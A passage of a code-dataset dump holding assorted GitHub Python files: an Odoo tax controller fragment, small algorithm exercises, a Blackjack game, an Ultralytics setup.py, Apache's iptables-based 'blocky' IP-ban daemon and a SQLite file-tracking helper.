float(non_tax_earning) > 0.0\n except:\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__ERROR_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'error': 'Required Parameter non_tax_earning not found or not '\n 'in the required type. Value must be a float greater than 0.0'}),)\n\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps(calculate_gmb_tax(gross, non_tax_earning)),)\n if country == 'ng':\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}),)\n if country == 'sa':\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}),)\n if country == 'lib':\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}),)\n return werkzeug.wrappers.Response(\n status=OUT__auth_gettokens__SUCCESS_CODE,\n content_type='application/json; charset=utf-8',\n headers=[('Cache-Control', 'no-store'),\n ('Pragma', 'no-cache')],\n response=json.dumps({'Result': \"Api Not Yet Ready\"}), )\n\n","repo_name":"Jacky-odoo/Ecobank","sub_path":"odoo/addons/base/res/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":11912,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"70310319234","text":"from heapq import heapify, heappush, heappop\n\n\n\ndef extract_k_max(lst, k):\n heap = lst[:k]\n heapify(heap)\n\n for i in lst[k:]:\n if i > heap[0]:\n heappop(heap)\n heappush(heap, i)\n return heap\n\n\nprint(extract_k_max([2, 5, 11, 3, 0, 20, 9, 98, 1, 99, 14, 100], 4))","repo_name":"avi3tal/knowledgebase","sub_path":"interviewbit/courses/programming/heaps_and_maps/extract_k_max_elements.py","file_name":"extract_k_max_elements.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"24674841593","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Oct 14 23:21:39 2023\r\n\r\n@author: ktk\r\n\"\"\"\r\n\r\n#AI Blackjack\r\nimport random\r\n# Define card ranks, suits, and values\r\nranks = [\"Two\", \"Three\", \"Four\", \"Five\", \"Six\", \"Seven\", \"Eight\", \"Nine\", \"Ten\", \"Jack\", \"Queen\", \"King\", \"Ace\"]\r\nsuits = [\"Hearts\", \"Diamonds\", \"Clubs\", \"Spades\"]\r\nvalues = [2, 3, 4, 5, 6, 7, 8, 9, 10, 10, 10, 10, 11]\r\n# Create a deck of cards\r\ndeck = [{\"Rank\": rank, \"Suit\": suit, \"Value\": value} for rank in ranks for suit in suits for value in values]\r\n# Function to calculate the total value of a hand\r\ndef calculate_hand_value(hand):\r\n value = sum(card[\"Value\"] for card in hand)\r\n if value > 21 and any(card[\"Rank\"] == \"Ace\" for card in hand):\r\n value -= 10 # Adjust for the value of Aces\r\n return value\r\n# Function to display a player's hand\r\ndef display_hand(hand):\r\n for card in hand:\r\n print(f\"{card['Rank']} of {card['Suit']}\")\r\n# Initialize player and dealer hands\r\nplayer_hand = [random.choice(deck), random.choice(deck)]\r\ndealer_hand = [random.choice(deck), random.choice(deck)]\r\n# Main game loop\r\nwhile True:\r\n print(\"\\nPlayer's Hand:\")\r\n display_hand(player_hand)\r\n player_value = calculate_hand_value(player_hand)\r\n print(f\"Total Value: {player_value}\")\r\n if player_value == 21:\r\n print(\"Blackjack! You win!\")\r\n break\r\n elif player_value > 21:\r\n print(\"Bust! You lose.\")\r\n break\r\n action = input(\"Do you want to 'Hit' or 'Stand'? \").strip().lower()\r\n if action == 'hit':\r\n player_hand.append(random.choice(deck))\r\n elif action == 'stand':\r\n while calculate_hand_value(dealer_hand) < 17:\r\n dealer_hand.append(random.choice(deck))\r\n print(\"\\nDealer's Hand:\")\r\n display_hand(dealer_hand)\r\n dealer_value = calculate_hand_value(dealer_hand)\r\n print(f\"Total Value: {dealer_value}\")\r\n if dealer_value > 21:\r\n print(\"Dealer busts! You win!\")\r\n elif dealer_value >= player_value:\r\n print(\"Dealer wins.\")\r\n else:\r\n print(\"You win!\")\r\n break\r\n else:\r\n print(\"Invalid choice. Please enter 'Hit' or 'Stand'.\")\r\n","repo_name":"kayteekay1412/Game-Gallery","sub_path":"Blackjack.py","file_name":"Blackjack.py","file_ext":"py","file_size_in_byte":2182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"41977435447","text":"from shutil import copytree\nimport os\nfrom pathlib import Path\nfrom string import Template\nimport logging\n\n\nclass LexetHome():\n def __init__(self, config, home):\n self.config = config\n self.home = home\n\n def exists(self):\n return Path(self.home).expanduser().exists()\n\n def create(self):\n logging.info('creation lexet root')\n self.create_home_dir()\n self.init_config()\n\n def create_home_dir(self):\n logging.info(\n Template('creation home directory \"$home\"')\n .substitute(\n home = self.home\n )\n )\n command_parts = ['mkdir']\n command_parts.append('--parent')\n command_parts.append('--verbose')\n command_parts.append(self.home)\n os.system(' '.join(command_parts))\n\n def init_config(self):\n self.prepare_atom_home()\n\n def prepare_atom_home(self):\n logging.info(\n Template('copy atom home to \"$atom_home\"')\n .substitute(\n atom_home = self.config['root']['atom_home']\n )\n )\n\n copytree(\n Path(\n self.config['init']['atom_home']\n ),\n Path(\n self.config['root']['atom_home']\n ).expanduser(),\n )\n","repo_name":"lexatnet/lexet","sub_path":"src/lib/home.py","file_name":"home.py","file_ext":"py","file_size_in_byte":1124,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"}
+{"seq_id":"11962267437","text":"T = int(input())\n\nfor Test in range(T):\n A = int(input())\n arr = list(map(int,input().split()))\n People = [0]*101\n ans = 0\n a = 0\n count = 0\n for Score in arr:\n for i in range(101):\n if i == Score:\n People[i] += 1\n for k in People:\n if a <= k:\n ans = count\n a = k\n count += 1\n print(f'#{Test+1} {ans}')","repo_name":"sw200662/Algorithm_my","sub_path":"2107/0727/swea1204.py","file_name":"swea1204.py","file_ext":"py","file_size_in_byte":398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"7347626363","text":"\"\"\"A setuptools based setup module.\n\nSee:\nhttps://packaging.python.org/guides/distributing-packages-using-setuptools/\nhttps://github.com/pypa/sampleproject\n\"\"\"\n\nimport pathlib\nimport re\n\n# Always prefer setuptools over distutils\nfrom setuptools import setup, find_packages\n\nhere = pathlib.Path(__file__).parent.resolve() # current path\nlong_description = (here / 'README.md').read_text(encoding='utf-8') # Get the long description from the README file\nwith open(here / 'requirements.txt') as fp: # read requirements.txt\n install_reqs = [r.rstrip() for r in fp.readlines() if not r.startswith('#')]\n\n\ndef get_version():\n file = here / 'src/ultralytics/__init__.py'\n return re.search(r'^__version__ = [\\'\"]([^\\'\"]*)[\\'\"]', file.read_text(), re.M).group(1)\n\n\nsetup(\n name='ultralytics', # Required https://packaging.python.org/specifications/core-metadata/#name\n version=get_version(), # Required https://packaging.python.org/en/latest/single_source_version.html\n description='Ultralytics YOLOv5 Python package, https://ultralytics.com', # Optional\n long_description=long_description, # Optional\n long_description_content_type='text/markdown', # Optional\n url='https://github.com/ultralytics/pip', # Optional, project's main homepage\n author='Glenn Jocher', # Optional, name or the name of the organization which owns the project\n author_email='glenn.jocher@ultralytics.com', # Optional\n classifiers=['Development Status :: 5 - Production/Stable', # 3 - Alpha, 4 - Beta, 5 - Production/Stable\n 'Intended Audience :: Developers', # Indicate who your project is intended for\n 'Operating System :: OS Independent',\n 'Topic :: Education', # Topics\n 'Topic :: Scientific/Engineering',\n 'Topic :: Scientific/Engineering :: Artificial Intelligence',\n 'Topic :: Scientific/Engineering :: Image Recognition',\n 'License :: OSI Approved :: GNU General Public License v3 (GPLv3)', # Pick your license as you wish\n 'Programming Language :: Python :: 3.7', # Python version support\n 'Programming Language :: Python :: 3.8',\n 'Programming Language :: Python :: 3.9',\n ], # Classifiers help users find your project by categorizing it https://pypi.org/classifiers/\n keywords='machine-learning, deep-learning, ml, pytorch, YOLO, object-detection, YOLOv3, YOLOv4, YOLOv5', # Optional\n package_dir={'': 'src'}, # Optional, use if source code is in a subdirectory under the project root, i.e. `src/`\n packages=find_packages(where='src'), # Required\n python_requires='>=3.7, <4',\n\n # For an analysis of \"install_requires\" vs pip's requirements files see:\n # https://packaging.python.org/en/latest/requirements.html\n install_requires=install_reqs, # Optional, additional pip packeges to be installed by this pacakge installation\n\n # List additional groups of dependencies here (e.g. development\n # dependencies). Users will be able to install these using the \"extras\"\n # syntax, for example: $ pip install sampleproject[dev]\n # Similar to `install_requires` above, these must be valid existing projects\n extras_require={'dev': ['check-manifest'],\n 'test': ['coverage'],\n }, # Optional\n\n package_data={'ultralytics': ['package_data.dat'],\n }, # Optional, Data files included in your packages that need to be installed\n\n # Although 'package_data' is the preferred approach, in some case you may\n # need to place data files outside of your packages. 
See:\n # http://docs.python.org/distutils/setupscript.html#installing-additional-files\n #\n # In this case, 'data_file' will be installed into '/my_data'\n data_files=[('my_data', ['data/data_file'])], # Optional\n\n # To provide executable scripts, use entry points in preference to the\n # \"scripts\" keyword. Entry points provide cross-platform support and allow\n # `pip` to create the appropriate form of executable for the target\n # platform.\n #\n # For example, the following would provide a command called `ultralytics` which\n # executes the function `main` from this package when invoked:\n entry_points={'console_scripts': ['ultralytics=ultralytics.console:main', ],\n }, # Optional\n\n project_urls={'Bug Reports': 'https://github.com/ultralytics/yolov5/issues',\n 'Funding': 'https://www.ultralytics.com',\n 'Source': 'https://github.com/ultralytics/yolov5/',\n }, # Optional https://packaging.python.org/specifications/core-metadata/#project-url-multiple-use\n)\n","repo_name":"ultralytics/pip","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":4736,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"61"}
+{"seq_id":"5202348544","text":"word_list = ['cat','dog','rabbit']\n\ndef add_and_return(a_char, a_set):\n a_set.add(a_char)\n return a_char\n\nseen = set()\n\nprint('Check:', [a_letter for a_word in word_list for a_letter in a_word])\n\nprint('Extra challenge:', [ add_and_return(a_letter, seen) for a_word in word_list for a_letter in a_word if a_letter not in seen ])\n","repo_name":"skymoore/data_structures_and_algorithms_1","sub_path":"ch1/1_4_3b.py","file_name":"1_4_3b.py","file_ext":"py","file_size_in_byte":335,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"38558684794","text":"def string_calcuation(mystring):\n interrogatives = (\"how\", \"what\", \"why\", \"where\", \"who\")\n new_string = mystring.capitalize()\n if mystring.startswith(interrogatives):\n return \"{}?\".format(new_string)\n else:\n return \"{}.\".format(new_string)\n\nresults = []\n\nwhile True:\n input_string = input(\"Say something: \")\n if input_string == \"\\end\":\n break\n results.append(string_calcuation(input_string))\n\nprint(\" \".join(results))","repo_name":"adamb0403/PythonMegaCourse","sub_path":"simple_program.py","file_name":"simple_program.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16226858934","text":"import collections\nfrom collections import Counter\n\nclass MostCommonWord:\n def find_most_common_word(self, paragraph, banned_word):\n for char in \"!?',;.\":\n paragraph = paragraph.replace(char, \" \")\n count = collections.Counter(\n word for word in paragraph.lower().split())\n count = count.most_common()\n print(count)\n banned_word = set(banned_word)\n for word in count:\n if word[0] not in banned_word:\n return word\n\nmostcommonword = MostCommonWord()\nmostcommonword.find_most_common_word(\"Bob. hIt, baLl\",[\"bob\", \"hit\"])","repo_name":"damerakd/Python-Scripts","sub_path":"most-common-word.py","file_name":"most-common-word.py","file_ext":"py","file_size_in_byte":609,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"16416778317","text":"import os\nimport sys\nimport time\nimport json\nfrom threading import Thread\nimport atexit, signal\nimport subprocess, argparse, grp, pwd\nimport ConfigParser\nimport smtplib\nimport socket\nimport urllib\nimport syslog\n\nsyslog.openlog('blocky', logoption=syslog.LOG_PID, facility=syslog.LOG_LOCAL0)\n\nconfig = ConfigParser.ConfigParser()\n\nes = None\nhostname = socket.gethostname()\nif hostname.find(\".apache.org\") == -1:\n\thostname = hostname + \".apache.org\"\nsyslog.syslog(syslog.LOG_INFO, \"Starting blocky on %s\" % hostname)\n\nclass Daemonize:\n\t\"\"\"A generic daemon class.\n\n\tUsage: subclass the daemon class and override the run() method.\"\"\"\n\n\tdef __init__(self, pidfile): self.pidfile = pidfile\n\n\tdef daemonize(self):\n\t\t\"\"\"Deamonize class. UNIX double fork mechanism.\"\"\"\n\n\t\ttry:\n\t\t\tpid = os.fork()\n\t\t\tif pid > 0:\n\t\t\t\t# exit first parent\n\t\t\t\tsys.exit(0)\n\t\texcept OSError as err:\n\t\t\tsys.stderr.write('fork #1 failed: {0}\\n'.format(err))\n\t\t\tsys.exit(1)\n\n\t\t# decouple from parent environment\n\t\tos.chdir('/')\n\t\tos.setsid()\n\t\tos.umask(0)\n\n\t\t# do second fork\n\t\ttry:\n\t\t\tpid = os.fork()\n\t\t\tif pid > 0:\n\n\t\t\t\t# exit from second parent\n\t\t\t\tsys.exit(0)\n\t\texcept OSError as err:\n\t\t\tsys.stderr.write('fork #2 failed: {0}\\n'.format(err))\n\t\t\tsys.exit(1)\n\n\t\t# redirect standard file descriptors\n\t\tsys.stdout.flush()\n\t\tsys.stderr.flush()\n\t\tsi = open(os.devnull, 'r')\n\t\tso = open(os.devnull, 'a+')\n\t\tse = open(os.devnull, 'a+')\n\n\t\tos.dup2(si.fileno(), sys.stdin.fileno())\n\t\tos.dup2(so.fileno(), sys.stdout.fileno())\n\t\tos.dup2(se.fileno(), sys.stderr.fileno())\n\n\t\t# write pidfile\n\t\tatexit.register(self.delpid)\n\n\t\tpid = str(os.getpid())\n\t\twith open(self.pidfile,'w+') as f:\n\t\t\tf.write(pid + '\\n')\n\n\tdef delpid(self):\n\t\tos.remove(self.pidfile)\n\n\tdef start(self, args):\n\t\t\"\"\"Start the daemon.\"\"\"\n\n\t\t# Check for a pidfile to see if the daemon already runs\n\t\ttry:\n\t\t\twith open(self.pidfile,'r') as pf:\n\n\t\t\t\tpid = int(pf.read().strip())\n\t\texcept IOError:\n\t\t\tpid = None\n\n\t\tif pid:\n\t\t\tmessage = \"pidfile {0} already exist. \" + \\\n\t\t\t\t\t\t\t\"Daemon already running?\\n\"\n\t\t\tsys.stderr.write(message.format(self.pidfile))\n\t\t\tsys.exit(1)\n\n\t\t# Start the daemon\n\t\tself.daemonize()\n\t\tself.run(args)\n\n\tdef stop(self):\n\t\t\"\"\"Stop the daemon.\"\"\"\n\n\t\t# Get the pid from the pidfile\n\t\ttry:\n\t\t\twith open(self.pidfile,'r') as pf:\n\t\t\t\tpid = int(pf.read().strip())\n\t\texcept IOError:\n\t\t\tpid = None\n\n\t\tif not pid:\n\t\t\tmessage = \"pidfile {0} does not exist. 
\" + \\\n\t\t\t\t\t\t\t\"Daemon not running?\\n\"\n\t\t\tsys.stderr.write(message.format(self.pidfile))\n\t\t\treturn # not an error in a restart\n\n\t\t# Try killing the daemon process\n\t\ttry:\n\t\t\twhile 1:\n\t\t\t\tos.kill(pid, signal.SIGTERM)\n\t\t\t\ttime.sleep(0.1)\n\t\texcept OSError as err:\n\t\t\te = str(err.args)\n\t\t\tif e.find(\"No such process\") > 0:\n\t\t\t\tif os.path.exists(self.pidfile):\n\t\t\t\t\tos.remove(self.pidfile)\n\t\t\telse:\n\t\t\t\tprint (str(err.args))\n\t\t\t\tsys.exit(1)\n\n\tdef restart(self):\n\t\t\"\"\"Restart the daemon.\"\"\"\n\t\tself.stop()\n\t\tself.start()\n\n\tdef run(self):\n\t\t\"\"\"You should override this method when you subclass Daemon.\n\n\t\tIt will be called after the process has been daemonized by\n\t\tstart() or restart().\"\"\"\n\n\n\nclass Blocky(Thread):\n\tdef run(self):\n\t\tbaddies = {}\n\t\twhile True:\n\t\t\ttry:\n\t\t\t\tjs = json.loads(urllib.urlopen(config.get('aggregator','uri')).read())\n\t\t\t\tfor baddie in js:\n\t\t\t# Got a new one?? :)\n\t\t\t\t\ti = baddie['ip']\n\t\t\t\t\tta = baddie['target']\n\t\t\t\t\tif not i in baddies and (ta == hostname or ta == '*') and not 'unban' in baddie:\n\t\t\t\t\t\tr = baddie['reason'] if 'reason' in baddie else 'Unknown reason'\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t# Check if we already have such a ban in place using iptables -C\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\t\"-C\", \"INPUT\",\n\t\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\t\"--comment\",\n\t\t\t\t\t\t\t\t\t\"Banned by Blocky\"\n\t\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\t\t# If we reach this point, the rule exists, no need to re-add it\n\t\t\t\t\t\t\texcept subprocess.CalledProcessError as err:\n\t\t\t\t\t\t\t\t# We're here which means the rule didn't exist, so let's add it!\n\t\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\t\"-A\", \"INPUT\",\n\t\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\t\"--comment\",\n\t\t\t\t\t\t\t\t\t\"Banned by Blocky\"\n\t\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\t\tmessage = \"\"\"%s banned %s (%s) - Unban with: sudo iptables -D INPUT -s %s -j DROP -m comment --comment \"Banned by Blocky\"\\n\"\"\" % (hostname, i, r, i)\n\t\t\t\t\t\t\t\tsyslog.syslog(syslog.LOG_INFO, message)\n\t\t\t\t\t\texcept Exception as err:\n\t\t\t\t\t\t\tsyslog.syslog(syslog.LOG_INFO, \"Blocky encountered an error: \" + str(err))\n\t\t\t\t\t\tbaddies[i] = time.time()\n\t\t\t\t\telif (not i in baddies or (i in baddies and (time.time() - baddies[i]) > 1800)) and (ta == hostname or ta == '*') and 'unban' in baddie and baddie['unban'] == True:\n\t\t\t\t\t\tbaddies[i] = time.time()\n\t\t\t\t\t\tr = baddie['reason'] if 'reason' in baddie else 'Unknown reason'\n\t\t\t\t\t\t# Check if we already have such a ban in place using iptables -C\n\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\"-C\", \"INPUT\",\n\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\"--comment\",\n\t\t\t\t\t\t\t\t\"Banned by Blocky\"\n\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\t# If we reach this point, the rule exists, and we can remove it\n\t\t\t\t\t\t\tsyslog.syslog(syslog.LOG_INFO, \"Unbanning %s\" % i)\n\t\t\t\t\t\t\tsubprocess.check_call([\n\t\t\t\t\t\t\t\t\"iptables\",\n\t\t\t\t\t\t\t\t\"-D\", 
\"INPUT\",\n\t\t\t\t\t\t\t\t\"-s\", i,\n\t\t\t\t\t\t\t\t\"-j\", \"DROP\",\n\t\t\t\t\t\t\t\t\"-m\", \"comment\",\n\t\t\t\t\t\t\t\t\"--comment\", \"Banned by Blocky\"\n\t\t\t\t\t\t\t\t])\n\t\t\t\t\t\t\tmessage = \"\"\"From: Blocky \nTo: Apache Infrastructure Root \nReply-To: root@apache.org\nSubject: [Blocky] Unbanned %s on %s.\n\nHi, this is %s.\nI have just unbanned %s on this machine due to leniency\nfrom the Blocky master server.\n\nWith regards,\nBlocky.\n\t\"\"\" % (i, hostname, hostname, i)\n\t\t\t\t\t\t\tsmtpObj = smtplib.SMTP('localhost')\n\t\t\t\t\t\t\tsmtpObj.sendmail(\"blocky@\" + hostname, ['root@apache.org'], message)\n\n\t\t\t\t\t\texcept Exception as err:\n\t\t\t\t\t\t\tpass\n\t\t\t\t\t\tif i in baddies:\n\t\t\t\t\t\t\tdel baddies[i]\n\t\t\t\ttime.sleep(180)\n\t\t\texcept Exception as err:\n\t\t\t\tsyslog.syslog(syslog.LOG_INFO, \"Error while running ban check: %s\" % err)\n\t\t\t\ttime.sleep(180) # Don't loop every 5ms if we hit a snag!\n\n\n\nparser = argparse.ArgumentParser(description='Command line options.')\nparser.add_argument('--user', dest='user', type=str, nargs=1,\n\t\t\t\t\thelp='Optional user to run Blocky as')\nparser.add_argument('--group', dest='group', type=str, nargs=1,\n\t\t\t\t\thelp='Optional group to run Blocky as')\nparser.add_argument('--pidfile', dest='pidfile', type=str, nargs=1,\n\t\t\t\t\thelp='Optional pid file location')\nparser.add_argument('--daemonize', dest='daemon', action='store_true',\n\t\t\t\t\thelp='Run as a daemon')\nparser.add_argument('--stop', dest='kill', action='store_true',\n\t\t\t\t\thelp='Kill the currently running Blocky process')\nargs = parser.parse_args()\n\npidfile = \"/var/run/blocky.pid\"\nif args.pidfile and len(args.pidfile) > 2:\n\tpidfile = args.pidfile\n\ndef main():\n\n\tif args.group and len(args.group) > 0:\n\t\tgid = grp.getgrnam(args.group[0])\n\t\tos.setgid(gid[2])\n\n\tif args.user and len(args.user) > 0:\n\t\tprint(\"Switching to user %s\" % args.user[0])\n\t\tuid = pwd.getpwnam(args.user[0])[2]\n\t\tos.setuid(uid)\n\n\tblocky = Blocky()\n\tblocky.start()\n\n\n## Daemon class\nclass MyDaemon(Daemonize):\n\tdef run(self, args):\n\t\tmain()\n\n# Get started!\nif args.kill:\n\tprint(\"Stopping Blocky\")\n\tdaemon = MyDaemon(pidfile)\n\tdaemon.stop()\nelse:\n\tconfig.read(\"blocky.cfg\")\n\n\tif args.daemon:\n\t\tprint(\"Daemonizing...\")\n\t\tdaemon = MyDaemon(pidfile)\n\t\tdaemon.start(args)\n\telse:\n\t\tmain()\n","repo_name":"jromy5/git-clone-https-github.com-apache-infrastructure-puppet","sub_path":"modules/blocky/files/blocky.py","file_name":"blocky.py","file_ext":"py","file_size_in_byte":7476,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"}
+{"seq_id":"43472868386","text":"def secfun(myarr, i)\t:\n\tfor j in range(3, len(myarr[i])):\t#each element of the line\n\t\t\t\tfor k in range(0, len(myarr)):\t#each line checking again\n\t\t\t\t\tif((len(myarr[k]) != 0) and (len(myarr[i]) != 0)):\n\t\t\t\t\t\tif(myarr[i][j].replace(',','') == myarr[k][0]):\n\t\t\t\t\t\t\tsecfun(myarr, k)\n\t\t\t\t\t\t\tdel myarr[k][:]\n\ndef check(myarr):\n\tfor i in range(0, len(myarr)):\t#each line\n\t\tif(len(myarr[i]) != 0):\n\t\t\tsecfun(myarr, i)\n\n\n\treturn myarr\n\nfstream = open(\"input.txt\", \"r\")\n\nmyarr = []\n\nfor line in fstream:\n\tline = line.split()\n\tmyarr.append(line)\n\nfor i in range(0, len(myarr)):\n\tif(len(myarr[i]) < 3):\n\t\tdel myarr[i][:]\n\nmyarr = [x for x in myarr if x != []]\n\nmyarr = check(myarr)\n\nmyarr = [x for x in myarr if x != []]\n\nfor i in range(0, len(myarr)):\n\tprint(myarr[i])\n\nprint(myarr[0][0])","repo_name":"rounakdatta/aoc-2017","sub_path":"d7/d7p1.py","file_name":"d7p1.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
+{"seq_id":"72302344834","text":"import sqlite3\nfrom sqlite3 import Error\nimport os\nimport hashlib\n\n# -------------------------------------------------\n# クラス\n\n# dataファイル情報クラス\n\n\nclass DataFile:\n def __init__(self, id, basename, path=None):\n self.id = id\n self.basename = basename\n self.path = path\n self.graph_png_path = None\n self.graph_html_path = None\n\n def __call__(self, datafile_json):\n try:\n self.id = datafile_json['id']\n self.basename = datafile_json['basename']\n self.path = datafile_json['path']\n except KeyError as e:\n print(e)\n\n return self\n\n def print(self):\n print(self.id, self.basename, self.path,\n self.graph_png_path, self.graph_html_path)\n\n\nclass GraphFile:\n def __init__(self, hash, id_list, path=None):\n self.hash = hash\n self.id_list = id_list\n self.path = path\n\n\n# データ��ァイルリクエストクラス\n# mode=\"READ\" or \"WRITE\",\n# READの場合はid_listかall_flagを指定\nclass READ_DataFile_Request:\n def __init__(self, all_flag=False, id_list=None):\n self.mode = \"READ_DATAFILE\"\n self.all_flag = all_flag\n self.id_list = id_list\n if self.all_flag == False and id_list == None:\n raise ValueError('id_list or all_flag must be specified.')\n\n def __call__(self, cursor):\n if self.all_flag:\n cursor.execute(\"SELECT id, basename, path FROM datafile\")\n else:\n cursor.execute(\"SELECT id, basename, path FROM datafile WHERE id IN ({})\".format(\n ','.join('?'*len(self.id_list))), self.id_list)\n rows = cursor.fetchall()\n datafile_list = []\n for row in rows:\n id, basename, path = row\n datafile = DataFile(id, basename, path)\n datafile_list.append(datafile)\n return datafile_list\n\n\nclass READ_Graph_Request:\n def __init__(self, graph_hash):\n self.mode = \"READ_GRAPH\"\n self.graph_hash = graph_hash\n\n def __call__(self, cursor):\n cursor.execute(\"SELECT * FROM graph WHERE hash=?\", (self.graph_hash,))\n row = cursor.fetchone()\n if row is None:\n return None\n else:\n hash, id_list_str, path = row\n id_list = list(map(int, id_list_str.split()))\n return GraphFile(hash, id_list, path)\n\n\nclass WRITE_Graph_Request:\n def __init__(self, id_list):\n self.mode = \"WRITE_GRAPH\"\n self.id_list = id_list\n self.id_list_str = ' '.join(map(str, sorted(self.id_list)))\n self.hash = None\n self.path = None\n\n def __call__(self, cursor):\n # id_listをソートしてASH-256でハッシュ化\n salt = 'salt0910'\n hash = hashlib.sha1(self.id_list_str.encode(\n 'utf-8') + salt.encode('utf-8')).hexdigest()\n row = cursor.execute(\n \"SELECT * FROM graph WHERE hash=?\", (hash,)).fetchone()\n if row is None:\n cursor.execute(\"INSERT INTO graph (hash, id, path) VALUES (?, ?, ?)\",\n (hash, self.id_list_str, \"None\"))\n self.hash = hash\n return self\n\n\n# -------------------------------------------------\n# モジュール\n\n\n# 情報をDBとやりとり\ndef request_db(db_request):\n conn = None\n\n # Create a database connection to a SQLite database\n conn = sqlite3.connect('server/data/db.sqlite')\n c = conn.cursor()\n contents = db_request(c)\n conn.commit()\n conn.close()\n return contents\n\n\ndef init_db():\n conn = None\n\n # Create a database connection to a SQLite database\n conn = sqlite3.connect('server/data/db.sqlite')\n c = conn.cursor()\n\n # テーブルが既に存在していれば削除\n c.execute(\"DROP TABLE IF EXISTS datafile\")\n\n # datafileテーブルを作成\n c.execute('''CREATE TABLE datafile\n (id INTEGER PRIMARY KEY AUTOINCREMENT,\n basename TEXT NOT NULL,\n path TEXT)''')\n\n # data/ディレクトリ内のCSVファイルを検索してデータを挿入\n data_dir = 'server/data/csv'\n for filename in os.listdir(data_dir):\n if filename.endswith('.csv'):\n basename = 
os.path.splitext(filename)[0]\n path = os.path.join(data_dir, filename)\n c.execute(\n \"INSERT INTO datafile (basename, path) VALUES (?, ?)\", (basename, path))\n\n # テーブルが既に存在していれば削除\n c.execute(\"DROP TABLE IF EXISTS graph\")\n\n # graphテーブルを作成\n # hash:文字列、id:整数のリスト、path:グラフ画像のパス\n c.execute('''CREATE TABLE graph\n (hash TEXT PRIMARY KEY,\n id TEXT NOT NULL,\n path TEXT)''')\n\n # 変更をコミットする\n conn.commit()\n\n \"\"\"\n # 結果を表示\n c.execute(\"SELECT * FROM datafile\")\n rows = c.fetchall()\n for row in rows:\n print(row)\n \"\"\"\n\n conn.close()\n\n\nif __name__ == '__main__':\n init_db()\n datafile_list = request_db(READ_DataFile_Request(all_flag=True))\n for datafile in datafile_list:\n datafile.print()\n","repo_name":"sento-02/plot-webapp","sub_path":"server/app/utils/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":5165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"}
